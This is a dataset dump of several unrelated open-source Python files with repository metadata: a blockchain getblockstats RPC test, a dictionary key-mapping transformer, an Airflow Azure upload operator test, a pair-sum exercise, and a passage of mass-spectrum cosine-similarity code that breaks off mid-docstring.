d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
# Set the timestamps from the file so that the nodes can get out of Initial Block Download
self.nodes[0].setmocktime(mocktime)
self.sync_all()
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
test_data = os.path.join(TESTSDIR, self.options.test_data)
if self.options.gen_test_data:
self.generate_test_data(test_data)
else:
self.load_test_data(test_data)
self.sync_all()
stats = self.get_stats()
# Make sure all valid statistics are included but nothing else is
expected_keys = self.expected_stats[0].keys()
assert_equal(set(stats[0].keys()), set(expected_keys))
assert_equal(stats[0]['height'], self.start_height)
assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
for i in range(self.max_stat_pos+1):
self.log.info('Checking block %d\n' % (i))
assert_equal(stats[i], self.expected_stats[i])
# Check selecting block by hash too
blockhash = self.expected_stats[i]['blockhash']
stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
assert_equal(stats_by_hash, self.expected_stats[i])
# Make sure each stat can be queried on its own
for stat in expected_keys:
for i in range(self.max_stat_pos+1):
result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
assert_equal(list(result.keys()), [stat])
if result[stat] != self.expected_stats[i][stat]:
self.log.info('result[%s] (%d) failed, %r != %r' % (
stat, i, result[stat], self.expected_stats[i][stat]))
assert_equal(result[stat], self.expected_stats[i][stat])
# Make sure only the selected statistics are included (more than one)
some_stats = {'minfee', 'maxfee'}
stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
assert_equal(set(stats.keys()), some_stats)
# Test invalid parameters raise the proper json exceptions
tip = self.start_height + self.max_stat_pos
assert_raises_rpc_error(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
self.nodes[0].getblockstats, hash_or_height=tip+1)
assert_raises_rpc_error(-8, 'Target block height %d is negative' % (-1),
self.nodes[0].getblockstats, hash_or_height=-1)
# Make sure invalid stats are rejected
inv_sel_stat = 'asdfghjkl'
inv_stats = [
[inv_sel_stat],
['minfee' , inv_sel_stat],
[inv_sel_stat, 'minfee'],
['minfee', inv_sel_stat, 'maxfee'],
]
for inv_stat in inv_stats:
assert_raises_rpc_error(-8, 'Invalid selected statistic %s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
# Make sure we aren't always returning inv_sel_stat as the culprit stat
assert_raises_rpc_error(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
# Mainchain's genesis block shouldn't be found on regtest
assert_raises_rpc_error(-5, 'Block not found', self.nodes[0].getblockstats,
hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
# Invalid number of args
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats, '00', 1, 2)
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats)
if __name__ == '__main__':
GetblockstatsTest().main()
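# Illustrative invocations (added; paths assume the standard functional-test layout):
#     test/functional/rpc_getblockstats.py # replay the canned JSON fixture
#     test/functional/rpc_getblockstats.py --gen-test-data # regenerate the fixture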
| 41.916667
| 121
| 0.629225
|
from test_framework.blocktools import COINBASE_MATURITY
from test_framework.test_framework import BlinkhashTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
)
import json
import os
TESTSDIR = os.path.dirname(os.path.realpath(__file__))
class GetblockstatsTest(BlinkhashTestFramework):
start_height = 101
max_stat_pos = 2
def add_options(self, parser):
parser.add_argument('--gen-test-data', dest='gen_test_data',
default=False, action='store_true',
help='Generate test data')
parser.add_argument('--test-data', dest='test_data',
default='data/rpc_getblockstats.json',
action='store', metavar='FILE',
help='Test data file')
def set_test_params(self):
self.num_nodes = 1
self.setup_clean_chain = True
self.supports_cli = False
def get_stats(self):
return [self.nodes[0].getblockstats(hash_or_height=self.start_height + i) for i in range(self.max_stat_pos+1)]
def generate_test_data(self, filename):
mocktime = 1525107225
self.nodes[0].setmocktime(mocktime)
self.nodes[0].createwallet(wallet_name="testwallet")
self.nodes[0].generatetoaddress(COINBASE_MATURITY + 1, self.nodes[0].getnewaddress())
address = self.nodes[0].get_deterministic_priv_key().address
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.generate(self.nodes[0], 1)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=True)
self.nodes[0].sendtoaddress(address=address, amount=10, subtractfeefromamount=False)
self.nodes[0].settxfee(amount=0.003)
self.nodes[0].sendtoaddress(address=address, amount=1, subtractfeefromamount=True)
self.sync_all()
self.generate(self.nodes[0], 1)
self.expected_stats = self.get_stats()
blocks = []
tip = self.nodes[0].getbestblockhash()
blockhash = None
height = 0
while tip != blockhash:
blockhash = self.nodes[0].getblockhash(height)
blocks.append(self.nodes[0].getblock(blockhash, 0))
height += 1
to_dump = {
'blocks': blocks,
'mocktime': int(mocktime),
'stats': self.expected_stats,
}
with open(filename, 'w', encoding="utf8") as f:
json.dump(to_dump, f, sort_keys=True, indent=2)
def load_test_data(self, filename):
with open(filename, 'r', encoding="utf8") as f:
d = json.load(f)
blocks = d['blocks']
mocktime = d['mocktime']
self.expected_stats = d['stats']
self.nodes[0].setmocktime(mocktime)
self.sync_all()
for b in blocks:
self.nodes[0].submitblock(b)
def run_test(self):
test_data = os.path.join(TESTSDIR, self.options.test_data)
if self.options.gen_test_data:
self.generate_test_data(test_data)
else:
self.load_test_data(test_data)
self.sync_all()
stats = self.get_stats()
expected_keys = self.expected_stats[0].keys()
assert_equal(set(stats[0].keys()), set(expected_keys))
assert_equal(stats[0]['height'], self.start_height)
assert_equal(stats[self.max_stat_pos]['height'], self.start_height + self.max_stat_pos)
for i in range(self.max_stat_pos+1):
self.log.info('Checking block %d\n' % (i))
assert_equal(stats[i], self.expected_stats[i])
blockhash = self.expected_stats[i]['blockhash']
stats_by_hash = self.nodes[0].getblockstats(hash_or_height=blockhash)
assert_equal(stats_by_hash, self.expected_stats[i])
for stat in expected_keys:
for i in range(self.max_stat_pos+1):
result = self.nodes[0].getblockstats(hash_or_height=self.start_height + i, stats=[stat])
assert_equal(list(result.keys()), [stat])
if result[stat] != self.expected_stats[i][stat]:
self.log.info('result[%s] (%d) failed, %r != %r' % (
stat, i, result[stat], self.expected_stats[i][stat]))
assert_equal(result[stat], self.expected_stats[i][stat])
some_stats = {'minfee', 'maxfee'}
stats = self.nodes[0].getblockstats(hash_or_height=1, stats=list(some_stats))
assert_equal(set(stats.keys()), some_stats)
tip = self.start_height + self.max_stat_pos
assert_raises_rpc_error(-8, 'Target block height %d after current tip %d' % (tip+1, tip),
self.nodes[0].getblockstats, hash_or_height=tip+1)
assert_raises_rpc_error(-8, 'Target block height %d is negative' % (-1),
self.nodes[0].getblockstats, hash_or_height=-1)
inv_sel_stat = 'asdfghjkl'
inv_stats = [
[inv_sel_stat],
['minfee' , inv_sel_stat],
[inv_sel_stat, 'minfee'],
['minfee', inv_sel_stat, 'maxfee'],
]
for inv_stat in inv_stats:
assert_raises_rpc_error(-8, 'Invalid selected statistic %s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=inv_stat)
# Make sure we aren't always returning inv_sel_stat as the culprit stat
assert_raises_rpc_error(-8, 'Invalid selected statistic aaa%s' % inv_sel_stat,
self.nodes[0].getblockstats, hash_or_height=1, stats=['minfee' , 'aaa%s' % inv_sel_stat])
assert_raises_rpc_error(-5, 'Block not found', self.nodes[0].getblockstats,
hash_or_height='000000000019d6689c085ae165831e934ff763ae46a2a6c172b3f1b60a8ce26f')
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats, '00', 1, 2)
assert_raises_rpc_error(-1, 'getblockstats hash_or_height ( stats )', self.nodes[0].getblockstats)
if __name__ == '__main__':
GetblockstatsTest().main()
| true
| true
|
790db7299eb21cb742977befe834ae4e20ae0093
| 4,040
|
py
|
Python
|
transformer/transformers/map_keys.py
|
santunioni/transformer
|
a34b8b40cba81382c8483d590050c3e36cee5bff
|
[
"MIT"
] | 1
|
2022-02-21T22:15:08.000Z
|
2022-02-21T22:15:08.000Z
|
transformer/transformers/map_keys.py
|
santunioni/Transformer
|
a34b8b40cba81382c8483d590050c3e36cee5bff
|
[
"MIT"
] | null | null | null |
transformer/transformers/map_keys.py
|
santunioni/Transformer
|
a34b8b40cba81382c8483d590050c3e36cee5bff
|
[
"MIT"
] | null | null | null |
from typing import Any, Dict, Mapping, Optional, Set
from pydantic import validator
from transformer.transformers.abstract import ExtraHashableModel, Transformer
from transformer.transformers.flatters import Flatter, FlatterConfig, Unflatter
class ReportMissingData(Exception):
def __init__(self, keys: Set[str]):
self.keys = keys
self.message = f"The keys f{self.keys} are missing in the payload."
class MapKeysConfig(ExtraHashableModel):
"""
This is the configuration for the MapKeys transformer.
In order to call this transformer pass the name "map-keys" and a mapping dict.
"""
mapping: Mapping[str, str]
preserve_unmapped: bool = True
ignore_missing_data: bool = True
level_separator: str = "."
return_plain: bool = False
@validator("mapping")
def backwards_compatibility(cls, mapping: Mapping[str, str]):
return {
key.replace(".$[", "["): value.replace(".$[", "[")
for key, value in mapping.items()
}
class MapKeys(Transformer[MapKeysConfig]):
"""
The MapKeys is a complete dict re-designer.
It lets you rename keys and restructure the entire dict. Creating new nested data where there was none
and flattening data that was previously nested are both possible, all while preserving the data from
the input dictionary.
"""
def __init__(self, config: MapKeysConfig) -> None:
super().__init__(config)
self.__flatters_config = FlatterConfig(level_separator=config.level_separator)
self.__flatter = Flatter(self.__flatters_config)
self.__unflatter = Unflatter(self.__flatters_config)
def transform(
self, payload: Dict[str, Any], metadata: Optional[Dict[str, Any]] = None
):
"""
The mapping is done in 4 major steps:
1. Flattens the data.
2. Metadata Replacers:
Some key mapping parameters are specified in the metadata. Keys that have placeholders like
@{metadata_key} will be substituted with values from the specified metadata key.
3. Map Data.
At this point the keys of the mapping inside config match the keys of the flat payload. That is, the
payload and self._config.mapping have matching keys. Not all keys in the payload need to be in
self._config.mapping; what happens to those extra keys is chosen with the config
self._config.preserve_unmapped. If the opposite happens and self._config.mapping has keys not present
in the payload, the configuration self._config.ignore_missing_data chooses what should be done.
4. Unflattens the data.
:return: transformed and restructured data.
"""
flat_data = self.__flatter.transform(payload)
translated_dict: Dict = {}
map_keys_set = set(self._config.mapping.keys())
for map_key in map_keys_set.intersection(flat_data.keys()):
map_value = self._config.mapping[map_key]
if metadata is not None:
for meta_key, meta_value in metadata.items():
map_key = map_key.replace("@{" + meta_key + "}", str(meta_value))
map_value = map_value.replace(
"@{" + meta_key + "}", str(meta_value)
)
translated_dict[map_value] = flat_data[map_key]
if not self._config.ignore_missing_data:
missing_keys = map_keys_set - flat_data.keys()
if missing_keys:
raise ReportMissingData(missing_keys)
if self._config.preserve_unmapped:
for unmapped_key in flat_data.keys() - self._config.mapping.keys():
translated_dict[unmapped_key] = flat_data[unmapped_key]
if self._config.return_plain:
return translated_dict, metadata
if metadata is None:
return self.__unflatter.transform(translated_dict)
return self.__unflatter.transform(translated_dict, metadata)
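# --- Usage sketch (added for illustration; assumes Flatter/Unflatter nest on
# --- the "." separator exactly as used above). ---
#     config = MapKeysConfig(mapping={"user.name": "customer.full_name"},
#                            preserve_unmapped=False)
#     MapKeys(config).transform({"user": {"name": "Ada", "age": 36}})
#     # -> {"customer": {"full_name": "Ada"}} ("user.age" is dropped: unmapped)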
| 40.4
| 117
| 0.661634
|
from typing import Any, Dict, Mapping, Optional, Set
from pydantic import validator
from transformer.transformers.abstract import ExtraHashableModel, Transformer
from transformer.transformers.flatters import Flatter, FlatterConfig, Unflatter
class ReportMissingData(Exception):
def __init__(self, keys: Set[str]):
self.keys = keys
self.message = f"The keys f{self.keys} are missing in the payload."
class MapKeysConfig(ExtraHashableModel):
mapping: Mapping[str, str]
preserve_unmapped: bool = True
ignore_missing_data: bool = True
level_separator: str = "."
return_plain: bool = False
@validator("mapping")
def backwards_compatibility(cls, mapping: Mapping[str, str]):
return {
key.replace(".$[", "["): value.replace(".$[", "[")
for key, value in mapping.items()
}
class MapKeys(Transformer[MapKeysConfig]):
def __init__(self, config: MapKeysConfig) -> None:
super().__init__(config)
self.__flatters_config = FlatterConfig(level_separator=config.level_separator)
self.__flatter = Flatter(self.__flatters_config)
self.__unflatter = Unflatter(self.__flatters_config)
def transform(
self, payload: Dict[str, Any], metadata: Optional[Dict[str, Any]] = None
):
flat_data = self.__flatter.transform(payload)
translated_dict: Dict = {}
map_keys_set = set(self._config.mapping.keys())
for map_key in map_keys_set.intersection(flat_data.keys()):
map_value = self._config.mapping[map_key]
if metadata is not None:
for meta_key, meta_value in metadata.items():
map_key = map_key.replace("@{" + meta_key + "}", str(meta_value))
map_value = map_value.replace(
"@{" + meta_key + "}", str(meta_value)
)
translated_dict[map_value] = flat_data[map_key]
if not self._config.ignore_missing_data:
missing_keys = map_keys_set - flat_data.keys()
if missing_keys:
raise ReportMissingData(missing_keys)
if self._config.preserve_unmapped:
for unmapped_key in flat_data.keys() - self._config.mapping.keys():
translated_dict[unmapped_key] = flat_data[unmapped_key]
if self._config.return_plain:
return translated_dict, metadata
if metadata is None:
return self.__unflatter.transform(translated_dict)
return self.__unflatter.transform(translated_dict, metadata)
| true
| true
|
790db8137d4ea765b0aab062d890ecbd67994b6d
| 2,571
|
py
|
Python
|
tests/providers/microsoft/azure/transfers/test_local_to_wasb.py
|
ChaseKnowlden/airflow
|
6b71eac1997a7c0db3b8e3aed6b4e65d01871440
|
[
"Apache-2.0"
] | 15,947
|
2019-01-05T13:51:02.000Z
|
2022-03-31T23:33:16.000Z
|
tests/providers/microsoft/azure/transfers/test_local_to_wasb.py
|
ChaseKnowlden/airflow
|
6b71eac1997a7c0db3b8e3aed6b4e65d01871440
|
[
"Apache-2.0"
] | 14,603
|
2019-01-05T09:43:19.000Z
|
2022-03-31T23:11:59.000Z
|
tests/providers/microsoft/azure/transfers/test_local_to_wasb.py
|
ChaseKnowlden/airflow
|
6b71eac1997a7c0db3b8e3aed6b4e65d01871440
|
[
"Apache-2.0"
] | 8,429
|
2019-01-05T19:45:47.000Z
|
2022-03-31T22:13:01.000Z
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import datetime
import unittest
from unittest import mock
from airflow.models.dag import DAG
from airflow.providers.microsoft.azure.transfers.local_to_wasb import LocalFilesystemToWasbOperator
class TestLocalFilesystemToWasbOperator(unittest.TestCase):
_config = {
'file_path': 'file',
'container_name': 'container',
'blob_name': 'blob',
'wasb_conn_id': 'wasb_default',
'retries': 3,
}
def setUp(self):
args = {'owner': 'airflow', 'start_date': datetime.datetime(2017, 1, 1)}
self.dag = DAG('test_dag_id', default_args=args)
def test_init(self):
operator = LocalFilesystemToWasbOperator(task_id='wasb_operator_1', dag=self.dag, **self._config)
assert operator.file_path == self._config['file_path']
assert operator.container_name == self._config['container_name']
assert operator.blob_name == self._config['blob_name']
assert operator.wasb_conn_id == self._config['wasb_conn_id']
assert operator.load_options == {}
assert operator.retries == self._config['retries']
operator = LocalFilesystemToWasbOperator(
task_id='wasb_operator_2', dag=self.dag, load_options={'timeout': 2}, **self._config
)
assert operator.load_options == {'timeout': 2}
@mock.patch('airflow.providers.microsoft.azure.transfers.local_to_wasb.WasbHook', autospec=True)
def test_execute(self, mock_hook):
mock_instance = mock_hook.return_value
operator = LocalFilesystemToWasbOperator(
task_id='wasb_sensor', dag=self.dag, load_options={'timeout': 2}, **self._config
)
operator.execute(None)
mock_instance.load_file.assert_called_once_with('file', 'container', 'blob', timeout=2)
| 40.171875
| 105
| 0.710618
|
import datetime
import unittest
from unittest import mock
from airflow.models.dag import DAG
from airflow.providers.microsoft.azure.transfers.local_to_wasb import LocalFilesystemToWasbOperator
class TestLocalFilesystemToWasbOperator(unittest.TestCase):
_config = {
'file_path': 'file',
'container_name': 'container',
'blob_name': 'blob',
'wasb_conn_id': 'wasb_default',
'retries': 3,
}
def setUp(self):
args = {'owner': 'airflow', 'start_date': datetime.datetime(2017, 1, 1)}
self.dag = DAG('test_dag_id', default_args=args)
def test_init(self):
operator = LocalFilesystemToWasbOperator(task_id='wasb_operator_1', dag=self.dag, **self._config)
assert operator.file_path == self._config['file_path']
assert operator.container_name == self._config['container_name']
assert operator.blob_name == self._config['blob_name']
assert operator.wasb_conn_id == self._config['wasb_conn_id']
assert operator.load_options == {}
assert operator.retries == self._config['retries']
operator = LocalFilesystemToWasbOperator(
task_id='wasb_operator_2', dag=self.dag, load_options={'timeout': 2}, **self._config
)
assert operator.load_options == {'timeout': 2}
@mock.patch('airflow.providers.microsoft.azure.transfers.local_to_wasb.WasbHook', autospec=True)
def test_execute(self, mock_hook):
mock_instance = mock_hook.return_value
operator = LocalFilesystemToWasbOperator(
task_id='wasb_sensor', dag=self.dag, load_options={'timeout': 2}, **self._config
)
operator.execute(None)
mock_instance.load_file.assert_called_once_with('file', 'container', 'blob', timeout=2)
| true
| true
|
790db84293b6d95fe47f418cd8e8dee9afcd0519
| 461
|
py
|
Python
|
Exercises/Exercises_01/07_exercise.py
|
Szymon-Budziak/ASD_exercises_solutions
|
36ccbdae03a6c7e4ad141a2b7b01bef9353574ee
|
[
"MIT"
] | 7
|
2021-12-28T23:38:42.000Z
|
2022-03-29T16:36:16.000Z
|
Exercises/Exercises_01/07_exercise.py
|
Szymon-Budziak/ASD_exercises_solutions
|
36ccbdae03a6c7e4ad141a2b7b01bef9353574ee
|
[
"MIT"
] | null | null | null |
Exercises/Exercises_01/07_exercise.py
|
Szymon-Budziak/ASD_exercises_solutions
|
36ccbdae03a6c7e4ad141a2b7b01bef9353574ee
|
[
"MIT"
] | 4
|
2021-06-29T20:21:52.000Z
|
2022-03-12T10:04:17.000Z
|
# Given a sorted array A[1, ..., n] and a number x, write a program that determines
# whether there exist indices i and j such that A[i] + A[j] = x.
def sum_search(T, x):
l = 0
r = len(T) - 1
while l <= r:
if T[l] + T[r] == x:
return True
elif T[l] + T[r] > x:
r -= 1
else:
l += 1
return False
T = [2, 5, 8, 12, 16, 19, 20, 25, 34, 55, 81]
x = 37
print(sum_search(T, x))
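# Trace for the example above (added): the pointers close in from both ends
# until T[3] + T[7] = 12 + 25 = 37, so this prints True. Runs in O(n) time.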
| 21.952381
| 99
| 0.488069
|
def sum_search(T, x):
l = 0
r = len(T) - 1
while l <= r:
if T[l] + T[r] == x:
return True
elif T[l] + T[r] > x:
r -= 1
else:
l += 1
return False
T = [2, 5, 8, 12, 16, 19, 20, 25, 34, 55, 81]
x = 37
print(sum_search(T, x))
| true
| true
|
790db85459ceb8b54c79ae5345c445b6c1fb5bd1
| 21,310
|
py
|
Python
|
matchms/old/ms_similarity_classical.py
|
matchms/old-iomega-spec2vec
|
216b8f8b5e4ffd320b4575326a05fb6c7cd28223
|
[
"Apache-2.0"
] | null | null | null |
matchms/old/ms_similarity_classical.py
|
matchms/old-iomega-spec2vec
|
216b8f8b5e4ffd320b4575326a05fb6c7cd28223
|
[
"Apache-2.0"
] | null | null | null |
matchms/old/ms_similarity_classical.py
|
matchms/old-iomega-spec2vec
|
216b8f8b5e4ffd320b4575326a05fb6c7cd28223
|
[
"Apache-2.0"
] | 1
|
2020-07-04T23:28:55.000Z
|
2020-07-04T23:28:55.000Z
|
#
# Spec2Vec
#
# Copyright 2019 Netherlands eScience Center
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numba
import numpy as np
from scipy.optimize import linear_sum_assignment
from scipy import spatial
# Add multi core parallelization
from concurrent.futures import ThreadPoolExecutor #, as_completed
# TODO: consider using joblib or dask instead.
def mol_sim_matrix(fingerprints1,
fingerprints2,
method='cosine',
filename=None,
max_size=1000,
print_progress=True):
"""Create Matrix of all molecular similarities (based on molecular fingerprints).
If filename is not None, the result will be saved as npy.
To create molecular fingerprints see mol_fingerprints() function from MS_functions.
Args:
----
fingerprints1: list
List of molecular fingerprints (numpy arrays).
fingerprints2: list
List of molecular fingerprints (numpy arrays).
method: str
Method to compare molecular fingerprints. Can be 'cosine', 'dice' etc.
(see scipy.spatial.distance.cdist).
filename: str
Filename to save results to. OR: If file already exists it will be
loaded instead.
max_size: int
Maximum size of (sub) all-vs-all matrix to handle in one go. Will split
up larger matrices into
max_size x max_size matrices.
print_progress: bool, optional
If True, print phase of the run to indicate progress. Default = True.
"""
if filename is not None:
try:
molecular_similarities = np.load(filename)
print("Molecular similarity scores found and loaded.")
collect_new_data = False
except FileNotFoundError:
print("Could not find file ", filename)
print("Molecular scores will be calculated from scratch.")
collect_new_data = True
else:
collect_new_data = True
if collect_new_data:
# Create arrays of all fingerprints
fingerprints_arr1 = np.array(fingerprints1)
fingerprints_arr2 = np.array(fingerprints2)
# Calculate all-vs-all similarity matrix (similarity here= 1-distance )
matrix_size = (fingerprints_arr1.shape[0], fingerprints_arr2.shape[0])
molecular_similarities = np.zeros(matrix_size)
# Split large matrices up into smaller ones to track progress
splits = int(np.ceil(matrix_size[0]/max_size) * np.ceil(matrix_size[1]/max_size))
count_splits = 0
for i in range(int(np.ceil(matrix_size[0]/max_size))):
low1 = i * max_size
high1 = min((i + 1) * max_size, matrix_size[0])
for j in range(int(np.ceil(matrix_size[1]/max_size))):
low2 = j * max_size
high2 = min((j + 1) * max_size, matrix_size[1])
molecular_similarities[low1:high1, low2:high2] = 1 - spatial.distance.cdist(
fingerprints_arr1[low1:high1],
fingerprints_arr2[low2:high2],
method
)
# Track progress:
count_splits += 1
if print_progress:
print('\r',
"Calculated submatrix {} out of {}".format(count_splits, splits),
end="")
if print_progress:
print(20 * '--')
print("Succesfully calculated matrix with all-vs-all molecular similarity values.")
if filename is not None:
np.save(filename, molecular_similarities)
print("Matrix was saved under:", filename)
return molecular_similarities
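# --- Usage sketch (added for illustration; fingerprints are made-up bit vectors). ---
#     rng = np.random.RandomState(0)
#     fps1 = [rng.randint(0, 2, 128) for _ in range(5)]
#     fps2 = [rng.randint(0, 2, 128) for _ in range(3)]
#     sims = mol_sim_matrix(fps1, fps2, method='dice', print_progress=False)
#     sims.shape # (5, 3), entries are 1 - dice distance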
# --------------------------------------------------------------------------------------------------
# ---------------------------- classical spectra similarity measures -------------------------------
# --------------------------------------------------------------------------------------------------
def cosine_score_greedy(spec1,
spec2,
mass_shift,
tol,
min_intens=0,
use_numba=True):
"""Calculate cosine score between spectrum1 and spectrum2.
If mass_shift is not None and nonzero, the spectra will be shifted with
respect to each other by the difference in their parent masses.
Args:
----
spec1: Spectrum peaks and intensities as numpy array.
spec2: Spectrum peaks and intensities as numpy array.
mass_shift: float
Difference in parent mass of both spectra to account for. Set to 'None'
when no shifting is desired --> back to normal cosine score.
tol: float
Tolerance value to define how far two peaks can be apart to still count as match.
min_intens: float
Minimum intensity (relative to max.intensity peak in spectrum). Peaks with lower
intensity will be ignored --> higher min_intens is faster, but less precise.
use_numba: bool
If True (default), use the numba-accelerated pair finding.
"""
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
# normalize intensities:
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
# filter, if wanted:
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
if use_numba:
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
else:
zero_pairs = find_pairs(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
if use_numba:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
else:
nonzero_pairs = find_pairs(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
used1 = set()
used2 = set()
score = 0.0
used_matches = []
for m in matching_pairs:
if not m[0] in used1 and not m[1] in used2:
score += m[2]
used1.add(m[0])
used2.add(m[1])
used_matches.append(m)
# Normalize score:
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
return score, used_matches
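# Hedged usage sketch (illustrative, not from the original module): scores two
# small synthetic spectra with the greedy matcher. The peak arrays are
# hypothetical; columns are (m/z, intensity). use_numba=False keeps the
# example dependency-free beyond numpy.
def _demo_cosine_score_greedy():
    spec1 = np.array([[100.0, 0.7], [150.0, 1.0], [200.0, 0.2]])
    spec2 = np.array([[100.05, 0.6], [150.0, 0.9]])
    score, matches = cosine_score_greedy(spec1, spec2, mass_shift=None,
                                         tol=0.1, use_numba=False)
    return score, matches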
def cosine_score_hungarian(spec1,
spec2,
mass_shift,
tol,
min_intens=0):
"""Taking full care of weighted bipartite matching problem.
Use Hungarian algorithm (slow...)
Args:
--------
spec1: Spectrum peaks and intensities as numpy array.
spec2: Spectrum peaks and intensities as numpy array.
mass_shift: float
Difference in parent mass of both spectra to account for. Set to 'None'
when no shifting is desired --> back to normal cosine score.
tol: float
Tolerance value to define how far two peaks can be apart to still count as match.
min_intens: float
Minimum intensity (relative to max.intensity peak in spectrum). Peaks with lower
intensity will be ignored --> higher min_intens is faster, but less precise.
"""
if spec1.shape[0] == 0 or spec2.shape[0] == 0:
return 0.0, []
# Normalize intensities:
spec1[:, 1] = spec1[:, 1]/max(spec1[:, 1])
spec2[:, 1] = spec2[:, 1]/max(spec2[:, 1])
# Filter, if wanted:
spec1 = spec1[spec1[:, 1] > min_intens, :]
spec2 = spec2[spec2[:, 1] > min_intens, :]
zero_pairs = find_pairs_numba(spec1, spec2, tol, shift=0.0)
if mass_shift is not None \
and mass_shift != 0.0:
nonzero_pairs = find_pairs_numba(spec1, spec2, tol, shift=mass_shift)
matching_pairs = zero_pairs + nonzero_pairs
else:
matching_pairs = zero_pairs
matching_pairs = sorted(matching_pairs, key=lambda x: x[2], reverse=True)
# Use Hungarian_algorithm:
used_matches = []
list1 = list(set([x[0] for x in matching_pairs]))
list2 = list(set([x[1] for x in matching_pairs]))
matrix_size = (len(list1), len(list2))
matrix = np.ones(matrix_size)
if len(matching_pairs) > 0:
for m in matching_pairs:
matrix[list1.index(m[0]), list2.index(m[1])] = 1 - m[2]
        # Use the Hungarian algorithm to solve the linear sum assignment problem
row_ind, col_ind = linear_sum_assignment(matrix)
score = len(row_ind) - matrix[row_ind, col_ind].sum()
used_matches = [(list1[x], list2[y]) for (x, y) in zip(row_ind, col_ind)]
# Normalize score:
score = score/max(np.sum(spec1[:, 1]**2), np.sum(spec2[:, 1]**2))
else:
score = 0.0
return score, used_matches
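# Hedged comparison sketch (illustrative): the Hungarian variant solves the
# same matching problem optimally. Note that it always goes through
# find_pairs_numba, so numba must be importable. The spectra are the same
# hypothetical toy arrays as in the greedy sketch above.
def _demo_cosine_score_hungarian():
    spec1 = np.array([[100.0, 0.7], [150.0, 1.0], [200.0, 0.2]])
    spec2 = np.array([[100.05, 0.6], [150.0, 0.9]])
    score, matches = cosine_score_hungarian(spec1, spec2, mass_shift=None, tol=0.1)
    return score, matches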
def cosine_matrix_fast(spectra,
tol,
max_mz,
min_mz=0):
"""Calculates cosine similarity matrix.
    Be careful! Binning is done here by creating one-hot vectors.
    It is hence real, actual "binning", and different from the tolerance-based
    approach used in cosine_score_matrix!
    Also: tol here corresponds to about tol/2 in cosine_score_matrix...
"""
for i, spectrum in enumerate(spectra):
spec = np.array(spectrum.peaks.copy(), dtype=float)
# Normalize intensities:
spec[:, 1] = spec[:, 1]/np.max(spec[:, 1])
if i == 0:
vector = one_hot_spectrum(spec, tol, max_mz, shift=0, min_mz=min_mz, method='max')
spec_vectors = np.zeros((len(spectra), vector.shape[0]))
spec_vectors[0, :] = vector
else:
spec_vectors[i, :] = one_hot_spectrum(spec, tol,
max_mz, shift=0,
min_mz=min_mz,
method='max')
Cdist = spatial.distance.cdist(spec_vectors, spec_vectors, 'cosine')
return 1 - Cdist
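# Hedged usage sketch (illustrative): cosine_matrix_fast expects objects with
# a `.peaks` attribute. `_DemoSpectrum` is a hypothetical stand-in for the
# project's Spectrum class, mimicking only the attributes read here and in
# cosine_score_matrix below.
class _DemoSpectrum:
    def __init__(self, peaks, parent_mz=None):
        self.peaks = peaks
        self.parent_mz = parent_mz
def _demo_cosine_matrix_fast():
    s1 = _DemoSpectrum([(100.0, 0.7), (150.0, 1.0)])
    s2 = _DemoSpectrum([(100.0, 0.6), (150.0, 0.9)])
    # returns a 2x2 matrix of binned (one-hot) cosine similarities
    return cosine_matrix_fast([s1, s2], tol=0.5, max_mz=250.0)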
def cosine_score_matrix(spectra,
tol,
max_mz=1000.0,
# min_mz=0,
min_intens=0,
mass_shifting=False,
method='hungarian',
num_workers=4,
filename=None,
safety_points=None):
"""Create Matrix of all modified cosine similarities.
Takes some time to calculate, so better only do it once and save as npy.
Now implemented: parallelization of code using concurrent.futures and numba options.
spectra: list
List of spectra (of Spectrum class)
tol: float
